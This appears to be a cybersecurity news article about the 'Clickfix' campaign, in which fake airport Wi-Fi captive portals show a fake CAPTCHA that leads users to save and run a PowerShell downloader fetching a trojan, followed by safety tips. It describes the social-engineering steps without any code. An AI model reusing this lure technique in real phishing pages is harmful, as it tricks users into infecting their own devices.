The Cybersecuritynews researcher team uncovered a sophisticated social engineering campaign that is exploiting the public’s need for free internet access, using deceptive Wi-Fi portals to trick users into downloading and executing PowerShell-based malware.
Dubbed the “Clickfix” attack, this method turns a user’s own browser actions against them to compromise their system under the guise of a simple human verification step.
The attack targets on individuals in public spaces like airports, where the promise of “Free Wi-Fi” is a powerful lure. Unsuspecting users attempting to connect are redirected to a professionally designed but fake captive portal.
These pages, often hosted on insecure IP addresses rather than legitimate domains, mimic real network login screens, complete with logos and a CAPTCHA prompt to “prove you are not a robot,” a feature intended to build a false sense of security.
The core of the Clickfix attack lies in its clever manipulation of user behavior. After a user interacts with the fake CAPTCHA, a pop-up window appears with a set of “Verification Steps.”
Instead of a simple click, the instructions guide the user through a specific sequence of keyboard shortcuts: press Ctrl+S to save the web page, navigate to the browser’s downloads window, and press Enter to open the file, the Cybersecuritynews researcher team said.
This sequence is a social engineering trick designed to bypass standard browser security warnings about downloading executable files.
By instructing the user to save the page and run the file themselves, the attackers effectively get consent to execute malicious code. The downloaded file is not an image or document but a script that initiates the infection.
Once the user unwittingly executes the downloaded file, a malicious PowerShell script is launched.
Analysis of the attack chain with ANY.RUN Sandbox reveals that this script acts as a downloader, establishing a connection to a command-and-control server to fetch the primary malware payload. In this campaign, the payload has been identified as a network trojan.
PowerShell is a powerful tool for attackers because it is integrated into Windows and can execute commands, scripts, and payloads directly in memory, often evading detection by traditional antivirus solutions.
This type of fileless malware can be used for a wide range of malicious activities, including stealing sensitive information, deploying ransomware, or providing a persistent backdoor for remote access to the compromised device.
To safeguard against this threat, users should stay alert when connecting to public Wi-Fi, carefully examine the URLs of login pages, and be very cautious of any website that requires unusual keyboard commands for verification.
Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates.
APT24, a sophisticated cyber espionage group linked to China's People's Republic, has launched a relentless…
The Cl0p ransomware group has claimed responsibility for infiltrating Broadcom's internal systems as part of…
Grafana Labs has disclosed a critical security vulnerability affecting Grafana Enterprise that could allow attackers…
A critical security vulnerability has been discovered in ASUSTOR backup and synchronization software, allowing attackers…
Microsoft has introduced a practical new feature in Windows 11 designed specifically for public-facing monitors…
SonicWall has disclosed a critical stack-based buffer overflow vulnerability in its SonicOS SSLVPN service. That…